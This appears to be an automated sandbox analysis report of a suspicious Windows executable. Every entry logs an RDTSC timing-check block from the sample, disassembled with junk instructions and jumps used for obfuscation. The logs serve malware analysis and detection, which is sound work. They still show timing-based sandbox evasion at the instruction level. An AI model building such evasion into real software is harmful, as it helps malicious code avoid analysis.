Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C00E0 second address: 72C0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, BEh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b jmp 00007FF1148823CEh 0x00000010 push eax 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF1148823D1h 0x00000018 or eax, 67804576h 0x0000001e jmp 00007FF1148823D1h 0x00000023 popfd 0x00000024 mov ebx, esi 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 jmp 00007FF1148823CAh 0x0000002d mov ebx, dword ptr [eax+10h] 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FF1148823CDh 0x00000039 jmp 00007FF1148823CBh 0x0000003e popfd 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0155 second address: 72C015A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C015A second address: 72C01AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF1148823D5h 0x00000009 sbb ax, 3AE6h 0x0000000e jmp 00007FF1148823D1h 0x00000013 popfd 0x00000014 mov ax, 9917h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, esi 0x0000001c jmp 00007FF1148823CAh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF1148823CEh 0x00000029 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C01AD second address: 72C01BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF114F0297Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C01BF second address: 72C01EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FF1148823D7h 0x0000000e mov esi, dword ptr [759B06ECh] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C01EB second address: 72C01EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C01EF second address: 72C01F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C01F3 second address: 72C01F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C01F9 second address: 72C0266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FF1148823D1h 0x0000000f jne 00007FF114883223h 0x00000015 pushad 0x00000016 call 00007FF1148823CCh 0x0000001b call 00007FF1148823D2h 0x00000020 pop esi 0x00000021 pop edx 0x00000022 mov edi, esi 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 pushad 0x00000027 push ecx 0x00000028 mov ecx, edx 0x0000002a pop edi 0x0000002b mov di, si 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007FF1148823CDh 0x00000035 xchg eax, edi 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF1148823CDh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0266 second address: 72C030D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [75980B60h] 0x00000011 mov eax, 75F3E5E0h 0x00000016 ret 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007FF114F02982h 0x0000001e and esi, 53E4DFF8h 0x00000024 jmp 00007FF114F0297Bh 0x00000029 popfd 0x0000002a mov eax, 6A63A12Fh 0x0000002f popad 0x00000030 push 00000044h 0x00000032 jmp 00007FF114F02982h 0x00000037 pop edi 0x00000038 pushad 0x00000039 mov di, cx 0x0000003c pushfd 0x0000003d jmp 00007FF114F0297Ah 0x00000042 jmp 00007FF114F02985h 0x00000047 popfd 0x00000048 popad 0x00000049 xchg eax, edi 0x0000004a jmp 00007FF114F0297Eh 0x0000004f push eax 0x00000050 pushad 0x00000051 mov si, di 0x00000054 mov ecx, ebx 0x00000056 popad 0x00000057 xchg eax, edi 0x00000058 jmp 00007FF114F0297Fh 0x0000005d push dword ptr [eax] 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C030D second address: 72C0328 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0362 second address: 72C03A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FF114F0297Dh 0x00000014 and ecx, 2BE04CD6h 0x0000001a jmp 00007FF114F02981h 0x0000001f popfd 0x00000020 mov ebx, esi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C03A0 second address: 72C03F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF1148823D9h 0x0000000b and al, FFFFFFE6h 0x0000000e jmp 00007FF1148823D1h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 test esi, esi 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FF1148823CAh 0x00000022 adc ch, FFFFFF88h 0x00000025 jmp 00007FF1148823CBh 0x0000002a popfd 0x0000002b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C03F6 second address: 72C0441 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF114F02988h 0x00000008 sub ch, FFFFFFE8h 0x0000000b jmp 00007FF114F0297Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov eax, 6916A6DFh 0x00000018 popad 0x00000019 je 00007FF183571BF6h 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF114F02981h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0441 second address: 72C0451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1148823CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0451 second address: 72C04C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000000h 0x0000000d pushad 0x0000000e mov ebx, eax 0x00000010 movzx ecx, dx 0x00000013 popad 0x00000014 mov dword ptr [esi], edi 0x00000016 jmp 00007FF114F02981h 0x0000001b mov dword ptr [esi+04h], eax 0x0000001e jmp 00007FF114F0297Eh 0x00000023 mov dword ptr [esi+08h], eax 0x00000026 jmp 00007FF114F02980h 0x0000002b mov dword ptr [esi+0Ch], eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FF114F0297Dh 0x00000037 xor al, 00000026h 0x0000003a jmp 00007FF114F02981h 0x0000003f popfd 0x00000040 movzx eax, bx 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C04C9 second address: 72C04F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF1148823D7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C04F3 second address: 72C0541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02989h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c pushad 0x0000000d jmp 00007FF114F0297Ch 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 mov eax, dword ptr [ebx+50h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FF114F02988h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0541 second address: 72C0568 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+14h], eax 0x0000000c pushad 0x0000000d mov bh, ah 0x0000000f mov cx, dx 0x00000012 popad 0x00000013 mov eax, dword ptr [ebx+54h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b mov ecx, 571172E1h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0568 second address: 72C056E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C056E second address: 72C0572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0572 second address: 72C0576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0576 second address: 72C060B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b pushad 0x0000000c push edx 0x0000000d mov cx, 868Dh 0x00000011 pop ecx 0x00000012 push edi 0x00000013 pushfd 0x00000014 jmp 00007FF1148823D6h 0x00000019 sbb cl, FFFFFFD8h 0x0000001c jmp 00007FF1148823CBh 0x00000021 popfd 0x00000022 pop ecx 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+58h] 0x00000027 jmp 00007FF1148823CFh 0x0000002c mov dword ptr [esi+1Ch], eax 0x0000002f jmp 00007FF1148823D6h 0x00000034 mov eax, dword ptr [ebx+5Ch] 0x00000037 pushad 0x00000038 movzx eax, di 0x0000003b mov cx, dx 0x0000003e popad 0x0000003f mov dword ptr [esi+20h], eax 0x00000042 jmp 00007FF1148823D5h 0x00000047 mov eax, dword ptr [ebx+60h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d movsx ebx, si 0x00000050 mov ebx, esi 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C060B second address: 72C0651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, ADC2h 0x00000007 pushfd 0x00000008 jmp 00007FF114F02983h 0x0000000d sub si, 6CBEh 0x00000012 jmp 00007FF114F02989h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esi+24h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0651 second address: 72C0655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0655 second address: 72C065B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C065B second address: 72C0732 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 call 00007FF1148823CCh 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [ebx+64h] 0x00000012 pushad 0x00000013 call 00007FF1148823D7h 0x00000018 mov bx, si 0x0000001b pop eax 0x0000001c mov eax, edx 0x0000001e popad 0x0000001f mov dword ptr [esi+28h], eax 0x00000022 pushad 0x00000023 mov al, bh 0x00000025 pushfd 0x00000026 jmp 00007FF1148823D6h 0x0000002b and cx, 99A8h 0x00000030 jmp 00007FF1148823CBh 0x00000035 popfd 0x00000036 popad 0x00000037 mov eax, dword ptr [ebx+68h] 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FF1148823D4h 0x00000041 add ah, 00000008h 0x00000044 jmp 00007FF1148823CBh 0x00000049 popfd 0x0000004a jmp 00007FF1148823D8h 0x0000004f popad 0x00000050 mov dword ptr [esi+2Ch], eax 0x00000053 pushad 0x00000054 mov si, E5BDh 0x00000058 movzx ecx, di 0x0000005b popad 0x0000005c mov ax, word ptr [ebx+6Ch] 0x00000060 jmp 00007FF1148823D5h 0x00000065 mov word ptr [esi+30h], ax 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0732 second address: 72C0738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0738 second address: 72C0792 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF1148823D0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ax, word ptr [ebx+00000088h] 0x00000014 jmp 00007FF1148823CEh 0x00000019 mov word ptr [esi+32h], ax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FF1148823CEh 0x00000024 and ecx, 1E43B588h 0x0000002a jmp 00007FF1148823CBh 0x0000002f popfd 0x00000030 push eax 0x00000031 push edx 0x00000032 mov eax, 5865F615h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0792 second address: 72C0803 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF114F02982h 0x00000008 jmp 00007FF114F02985h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov eax, dword ptr [ebx+0000008Ch] 0x00000017 pushad 0x00000018 push esi 0x00000019 mov bx, F72Eh 0x0000001d pop ebx 0x0000001e call 00007FF114F02984h 0x00000023 mov bx, si 0x00000026 pop esi 0x00000027 popad 0x00000028 mov dword ptr [esi+34h], eax 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FF114F02988h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0803 second address: 72C08DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 91h 0x00000005 call 00007FF1148823CAh 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+18h] 0x00000011 jmp 00007FF1148823D1h 0x00000016 mov dword ptr [esi+38h], eax 0x00000019 jmp 00007FF1148823CEh 0x0000001e mov eax, dword ptr [ebx+1Ch] 0x00000021 jmp 00007FF1148823D0h 0x00000026 mov dword ptr [esi+3Ch], eax 0x00000029 pushad 0x0000002a mov cx, BF2Dh 0x0000002e popad 0x0000002f mov eax, dword ptr [ebx+20h] 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007FF1148823D5h 0x00000039 and cl, 00000036h 0x0000003c jmp 00007FF1148823D1h 0x00000041 popfd 0x00000042 pushfd 0x00000043 jmp 00007FF1148823D0h 0x00000048 add eax, 75059958h 0x0000004e jmp 00007FF1148823CBh 0x00000053 popfd 0x00000054 popad 0x00000055 mov dword ptr [esi+40h], eax 0x00000058 pushad 0x00000059 mov ebx, esi 0x0000005b mov si, 1007h 0x0000005f popad 0x00000060 lea eax, dword ptr [ebx+00000080h] 0x00000066 jmp 00007FF1148823CAh 0x0000006b push 00000001h 0x0000006d push eax 0x0000006e push edx 0x0000006f pushad 0x00000070 jmp 00007FF1148823CDh 0x00000075 mov eax, 18421DE7h 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C08DD second address: 72C097F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, DDh 0x00000005 pushfd 0x00000006 jmp 00007FF114F02984h 0x0000000b adc eax, 51F37D48h 0x00000011 jmp 00007FF114F0297Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FF114F02984h 0x00000022 add ah, FFFFFFA8h 0x00000025 jmp 00007FF114F0297Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007FF114F02988h 0x00000031 jmp 00007FF114F02985h 0x00000036 popfd 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007FF114F02981h 0x0000003e nop 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 mov bh, 52h 0x00000044 mov cx, CD7Bh 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C097F second address: 72C0985 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0985 second address: 72C0A3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-10h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF114F02984h 0x00000015 xor cx, 2928h 0x0000001a jmp 00007FF114F0297Bh 0x0000001f popfd 0x00000020 pushad 0x00000021 jmp 00007FF114F02986h 0x00000026 pushfd 0x00000027 jmp 00007FF114F02982h 0x0000002c adc ecx, 38A9B6B8h 0x00000032 jmp 00007FF114F0297Bh 0x00000037 popfd 0x00000038 popad 0x00000039 popad 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushfd 0x0000003f jmp 00007FF114F0297Bh 0x00000044 adc eax, 740AC87Eh 0x0000004a jmp 00007FF114F02989h 0x0000004f popfd 0x00000050 mov ecx, 46284AC7h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0A3C second address: 72C0A54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0A54 second address: 72C0A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0A58 second address: 72C0A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0AF2 second address: 72C0B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF114F0297Fh 0x00000009 jmp 00007FF114F02983h 0x0000000e popfd 0x0000000f mov dx, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov dword ptr [esi+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0B28 second address: 72C0B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0B2C second address: 72C0B43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02983h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0B43 second address: 72C0B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0B49 second address: 72C0B4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0B4D second address: 72C0B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+78h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop ecx 0x00000013 movsx edx, si 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0B6A second address: 72C0B96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 416A693Ah 0x00000008 mov ecx, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 00000001h 0x0000000f jmp 00007FF114F0297Dh 0x00000014 nop 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF114F0297Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0B96 second address: 72C0B9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0B9B second address: 72C0BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0BA1 second address: 72C0C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FF1148823D6h 0x0000000e mov eax, 4D981BA1h 0x00000013 popad 0x00000014 nop 0x00000015 pushad 0x00000016 mov edi, ecx 0x00000018 push ecx 0x00000019 pushfd 0x0000001a jmp 00007FF1148823D5h 0x0000001f sbb ecx, 5818DB26h 0x00000025 jmp 00007FF1148823D1h 0x0000002a popfd 0x0000002b pop ecx 0x0000002c popad 0x0000002d lea eax, dword ptr [ebp-08h] 0x00000030 jmp 00007FF1148823D7h 0x00000035 nop 0x00000036 pushad 0x00000037 movzx esi, dx 0x0000003a jmp 00007FF1148823D1h 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0C33 second address: 72C0C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0C37 second address: 72C0C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0C3B second address: 72C0C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0C7D second address: 72C0C83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0C83 second address: 72C0C94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF114F0297Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0C94 second address: 72C0CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov esi, ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0CA3 second address: 72C0CE7 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FF114F02981h 0x0000000c xor al, FFFFFFB6h 0x0000000f jmp 00007FF114F02981h 0x00000014 popfd 0x00000015 popad 0x00000016 test edi, edi 0x00000018 pushad 0x00000019 mov edi, eax 0x0000001b mov cx, 339Fh 0x0000001f popad 0x00000020 js 00007FF183571354h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0CE7 second address: 72C0CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0CEB second address: 72C0CF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0CF1 second address: 72C0D60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF1148823D4h 0x00000009 xor cx, E638h 0x0000000e jmp 00007FF1148823CBh 0x00000013 popfd 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebp-04h] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FF1148823D7h 0x00000025 sbb eax, 0D4978AEh 0x0000002b jmp 00007FF1148823D9h 0x00000030 popfd 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: 72C0D60 second address: 72C0D66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
